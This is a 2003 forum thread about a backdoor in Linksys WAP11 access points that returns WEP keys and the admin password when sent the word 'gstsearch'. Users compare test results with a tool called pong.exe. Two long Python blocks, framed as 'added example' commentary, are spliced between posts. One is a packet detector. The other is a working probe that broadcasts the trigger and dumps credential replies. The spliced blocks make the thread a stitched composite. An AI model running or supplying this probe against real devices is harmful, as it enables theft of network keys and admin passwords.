WAP Backdoor


Postby sysadmn » Fri Jan 31, 2003 8:07 am

I stumbled across this on the Wardriving.Com blog. It's a couple of months old, but still (IMHO) newsworthy.

It seems that the OEM SW developer put a backdoor in their software. By sending the word "gstsearch" to a particular port, the WAP will reply with the WEP keys, MAC filter settings, and admin password! It gets worse: this works from either the LAN or WAN interface! This definitely falls into the "WTF were they thinking?" category. Or did someone forget to #define before production release?

Nothing to worry about, unless your vendor bought this software. Anyone want to test the Linksys WAP11-V2.2?

http://archives.neohapsis.com/archives/bugtraq/2002-11/0008.html
Wigle Stats:
Total New Discovered Networks with GPS: 996
All Networks Recorded: 1,517
Networks This Month with GPS: 850
First Post: 26-Dec-2004
sysadmn
 
Posts: 124
Joined: Thu Jan 23, 2003 8:37 am
Location: in front of the computer, duh!

Postby sysadmn » Fri Jan 31, 2003 8:08 am

Sorry about the duplicate - @#$$#% back button!

Postby Thorn » Fri Jan 31, 2003 11:14 am

It seems to me this was posted once before (that C code looks awfully familiar), but it may have been lost in the Great Crash of '02. I also seem to recall that immediately following this, there was a flurry of new firmware issues from Linksys, D-Link and the others.

Still it wouldn't hurt to check...

Thanks for bringing this up again, sysadmn.
Thorn
Stop the TSA now! Boycott the airlines.
Thorn
 
Posts: 10340
Joined: Sat Apr 13, 2002 3:00 am
Location: Villa Straylight

It's been posted before

Postby nashr » Fri Jan 31, 2003 11:25 am

You may be right about losing it in the "great crash". I actually have a binary of the exploit, but have not had any successful tests in the lab against systems available to us here. Has anyone actually tested this out?

Just found the original post at:

http://forums.netstumbler.com/showthread.php?s=&threadid=4791&highlight=pong
Help! I've been Simpsonized!
nashr
 
Posts: 1585
Joined: Fri Aug 09, 2002 6:12 am
Location: Virginia

Postby MrEcho » Fri Jan 31, 2003 2:11 pm

Works on the WAP11 v2.2, fw 1.01j.
Wow, is that ever freaky.

It doesn't work on v2.6.
MrEcho
Mini Stumbler
 
Posts: 28
Joined: Sun Jan 19, 2003 6:12 am

Postby woodssc » Fri Jan 31, 2003 3:25 pm

How would a "non-programmer" type go about running this code against his access points? Thanks for any help. I have an Intel 2011 and a Linksys WAP11 2.2.
woodssc
Mini Stumbler
 
Posts: 50
Joined: Mon Jul 08, 2002 3:35 pm

READ!

Postby nashr » Fri Jan 31, 2003 4:14 pm

Go to the forum link I posted above... you will find your answers there.

Postby woodssc » Fri Jan 31, 2003 4:25 pm

Holy crap. WEP key and admin password on my WAP11 2.2 were displayed...

Postby Madhadder » Sat Feb 01, 2003 5:32 am

Interesting program...

Just how does it work??

Does it scan the local IP subnet on a certain port looking for a reply? If it does, how is this going to work trying to get this info from the wireless side of a WEP'd AP, since you will need an IP, and you can only get an IP if you already know the WEP key?
Madhadder
 
Posts: 1619
Joined: Sat Apr 13, 2002 5:37 am
Location: Munich, Germany

Postby MrEcho » Sat Feb 01, 2003 6:05 am

Well, if you look at the code, it sends it to 255.255.255.255 via UDP.
It's like a network broadcast.
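Seen from the defensive side, what MrEcho describes is a usable signature: a UDP datagram to 255.255.255.255 whose payload carries the word "gstsearch". The detector below is an added example written for this thread, not code from pong.exe, from Linksys or from the OEM. It parses raw IPv4/UDP packets (IP layer only, no link-layer header, so hand it the IP bytes from a pcap reader) and flags any payload containing the trigger, recording whether the destination was the broadcast address. The sample packets are constructed inline. PLACEHOLDER_PORT is a stand-in because the thread never states the port; the match is on the payload, so the port value does not change the result.

```python
"""
Added example, not from the thread: detect the "gstsearch" probe traffic on
the wire. Parses raw IPv4/UDP packets (no Ethernet header) and flags any
datagram whose payload contains the trigger word.

Assumptions (not stated on the page): the trigger appears verbatim in the UDP
payload; PLACEHOLDER_PORT below is only used to build sample packets and is
not the real port, which the thread does not give.
"""
import struct
import ipaddress
from typing import Optional, Tuple

TRIGGER = b"gstsearch"            # the word the thread says triggers the reply
BROADCAST = "255.255.255.255"     # MrEcho: the probe is sent here via UDP
PLACEHOLDER_PORT = 65000          # placeholder, NOT the port from the advisory


def parse_ipv4_udp(pkt: bytes) -> Optional[Tuple[str, str, int, int, bytes]]:
    """Return (src, dst, sport, dport, payload) for an IPv4/UDP packet,
    or None for anything else (IPv6, TCP, truncated, inconsistent lengths).
    Checksums are not verified; the detector only cares about the payload."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    total_len = struct.unpack("!H", pkt[2:4])[0]
    proto = pkt[9]
    if proto != 17 or ihl < 20 or len(pkt) < ihl + 8 or total_len > len(pkt):
        return None
    sport, dport, ulen = struct.unpack("!HHH", pkt[ihl:ihl + 6])
    if ulen < 8 or ihl + ulen > total_len:
        return None
    src = str(ipaddress.IPv4Address(pkt[12:16]))
    dst = str(ipaddress.IPv4Address(pkt[16:20]))
    payload = pkt[ihl + 8:ihl + ulen]
    return src, dst, sport, dport, payload


def classify(pkt: bytes) -> Optional[dict]:
    """One alert dict if the packet carries the trigger word, else None."""
    parsed = parse_ipv4_udp(pkt)
    if parsed is None:
        return None
    src, dst, sport, dport, payload = parsed
    if TRIGGER not in payload:
        return None
    broadcast = dst == BROADCAST
    return {
        "src": src,
        "dst": dst,
        "sport": sport,
        "dport": dport,
        "broadcast": broadcast,
        "verdict": "gstsearch probe (%s)" % ("broadcast" if broadcast else "directed"),
    }


def scan(packets) -> list:
    """Run classify() over an iterable of raw IP packets; keep the hits."""
    return [hit for hit in map(classify, packets) if hit is not None]


def build_ipv4_udp(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Build a constructed IPv4/UDP packet for testing. Checksums are left
    zero on purpose; parse_ipv4_udp() ignores them."""
    ulen = 8 + len(payload)
    udp = struct.pack("!HHHH", sport, dport, ulen, 0) + payload
    ip = struct.pack(
        "!BBHHHBBH4s4s",
        0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
        ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed,
    )
    return ip + udp


# Constructed sample traffic, not a capture: one broadcast probe, one probe
# aimed straight at an AP's LAN address, and an unrelated DNS-looking datagram.
SAMPLE_PACKETS = [
    build_ipv4_udp("192.168.1.50", BROADCAST, 40000, PLACEHOLDER_PORT, TRIGGER),
    build_ipv4_udp("192.168.1.50", "192.168.1.1", 40000, PLACEHOLDER_PORT, TRIGGER),
    build_ipv4_udp("192.168.1.50", "192.168.1.1", 40001, 53, b"\x12\x34\x01\x00\x00\x01"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_PACKETS):
        print("%(src)s -> %(dst)s:%(dport)d  %(verdict)s" % hit)
```

Hook parse_ipv4_udp() up to the IP layer of whatever your sensor gives you (a pcap reader, a mirror port on the LAN side, or the WAN-facing capture if the AP is exposed that way) and alert on any hit; a broadcast hit from a wireless client is the shape of the attack the thread describes.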

Postby MRK » Sun Feb 02, 2003 10:36 am

Ok, i have a couple of questions.

1) I downloaded this program and ran it from my laptop (connected to my WAP11). I just went to the command line and typed pong.exe, and it displayed several fields, but no info. Does this mean I'm OK? Or that my firmware isn't affected?

2) How do I determine what version of WAP11 I have? I think I have the 2.2. (Seeing as I bought it before the 2.6 was out... I think.) Is there a way of telling this by looking at the unit or looking at the online config? I haven't been able to find it. Thanks!!

-Mr.K
MRK
 
Posts: 241
Joined: Sun Aug 25, 2002 12:31 pm

Postby MrEcho » Sun Feb 02, 2003 11:48 am

Look on the back...

Postby MRK » Sun Feb 02, 2003 12:17 pm

I looked, but it wasn't there. Then I looked again, and I saw it in very small print. So... yeah. lol. Thanks.

-Mr.K

Postby MrEcho » Sun Feb 02, 2003 1:50 pm

Always read the fine print :)

Postby Thorn » Mon Feb 03, 2003 9:35 am

Tested against a WAP 11 v1.1 (firmware version 1.4g8) and WAP11 v2.2 (firmware version 1.01j) this AM.

Non-Associated:
WAP11 v1.1
Results: Both versions of pong reported "no answer"

WAP11 v2.2
Results: Both versions of pong reported "no answer"

Associated:
WAP11 v1.1
Results: Both versions of pong reported "no answer"

WAP11 v2.2
Results: Using both the original version and v1.1 of pong.exe, I was not able to get anything particularly useful. There was some output, but most of the output appeared to be junk (i.e. non-printable characters). However, part of the SSID did show in the "Admin Password" field of pong v1.1. Upon running v1.1 in the raw mode, the model, firmware version, WEP keys, SSID, and admin password were all displayed. I would suspect that the WAP11 has a slightly different data layout, hence when it is formatted for output in either version of pong.exe, the data appears to be trashed. However, the vulnerability still exists, and once the layout of the raw data is known, it is very easy to determine what the values are.

Conclusion:
Persons running a WAP11 v2.2 do have to worry about this exploit. However, WEP provides some protection as the data can only be extracted after the AP and the card have associated. If the WEP key is unknown, then association cannot take place.

Those persons running a WAP11 v2.2 without implementing WEP are the most vulnerable to this exploit.
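To make Thorn's "raw mode" point concrete, here is an added example (it is not pong.exe, and not Linksys or OEM code) that does what the thread describes: broadcast the trigger word over UDP, then dump each reply as hex plus ASCII and pull out printable runs the way `strings` would, instead of assuming fixed field offsets. Assumptions: the trigger is sent as the whole UDP payload; the port is not stated on this page, so it is taken from the command line (it is in the Bugtraq advisory sysadmn linked); the reply layout is unknown and, as Thorn found, varies by model, which is exactly why the dump does not try to name fields. DEMO_REPLY is constructed for offline illustration and is not a real capture or the real layout. As Madhadder and Thorn note, the sender needs an IP on the same segment, so on the wireless side this only works after association; from the wired LAN or WAN side no key is needed at all.

```python
"""
Added example, not the pong.exe from the thread and not Linksys/OEM code:
a minimal UDP broadcast probe plus a raw-mode dump of whatever comes back.

Assumptions, not facts from the thread:
  - the trigger string is sent as the entire UDP payload;
  - the port is passed in by the caller (the page only says "a particular
    port"; the advisory linked in the thread has it);
  - the reply layout is unknown and differs between models, so the dump only
    shows hex/ASCII and extracts printable runs; it names no fields.
"""
import socket
import string

TRIGGER = b"gstsearch"          # the word the thread says triggers the reply
BROADCAST = "255.255.255.255"   # MrEcho: "it sends it to 255.255.255.255 via UDP"

# Printable ASCII, including space, excluding control whitespace.
PRINTABLE = set(bytes(string.printable, "ascii")) - set(b"\t\n\r\x0b\x0c")


def hexdump(data: bytes, width: int = 16) -> list:
    """Classic hex + ASCII dump, one line per `width` bytes."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join("%02x" % b for b in chunk).ljust(width * 3 - 1)
        asc = "".join(chr(b) if b in PRINTABLE else "." for b in chunk)
        lines.append("%04x  %s  %s" % (off, hexpart, asc))
    return lines


def printable_runs(data: bytes, min_len: int = 4) -> list:
    """Extract runs of printable ASCII (like `strings`). This is how the SSID
    and admin password showed up in Thorn's raw-mode output even though the
    fixed-field formatter in pong.exe printed junk for his WAP11 v2.2."""
    runs, cur = [], bytearray()
    for b in data + b"\x00":          # trailing sentinel flushes the last run
        if b in PRINTABLE:
            cur.append(b)
        else:
            if len(cur) >= min_len:
                runs.append(cur.decode("ascii"))
            cur = bytearray()
    return runs


def analyse_reply(data: bytes) -> dict:
    """Raw-mode view of one reply datagram: length, dump, candidate strings."""
    return {"length": len(data), "hexdump": hexdump(data), "strings": printable_runs(data)}


def probe(port: int, timeout: float = 2.0, iface_ip: str = "0.0.0.0") -> list:
    """Broadcast TRIGGER once and collect (source_ip, reply_bytes) until the
    timeout. Network side effects: run only on a network you are authorised
    to test. Bind to a specific interface IP to pick the LAN or WAN side."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    s.bind((iface_ip, 0))
    s.settimeout(timeout)
    s.sendto(TRIGGER, (BROADCAST, port))
    replies = []
    try:
        while True:
            data, (src, _) = s.recvfrom(4096)
            replies.append((src, data))
    except socket.timeout:
        pass
    finally:
        s.close()
    return replies


# Constructed sample reply for offline demonstration; not a real capture and
# not the real layout, which the thread says differs between WAP11 revisions.
DEMO_REPLY = b"\x00\x01WAP11\x00\x001.01j\x00\x00\x00linksys\x00admin\x00\xff\xfe"

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        replies = probe(int(sys.argv[1]))   # port from the advisory, not this page
    else:
        replies = [("demo", DEMO_REPLY)]
    for src, data in replies:
        print("reply from %s, %d bytes" % (src, len(data)))
        for line in hexdump(data):
            print(line)
        print("printable runs:", printable_runs(data))
```

Run it with no argument to see the dump on the constructed sample, or with the port as the only argument to actually probe the local broadcast domain. An AP that answers with anything is the finding, regardless of whether the strings line up with a fixed-field parser; an AP that stays silent on both the LAN and WAN side across the timeout is how MrEcho's v2.6 and Thorn's v1.1 behaved.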
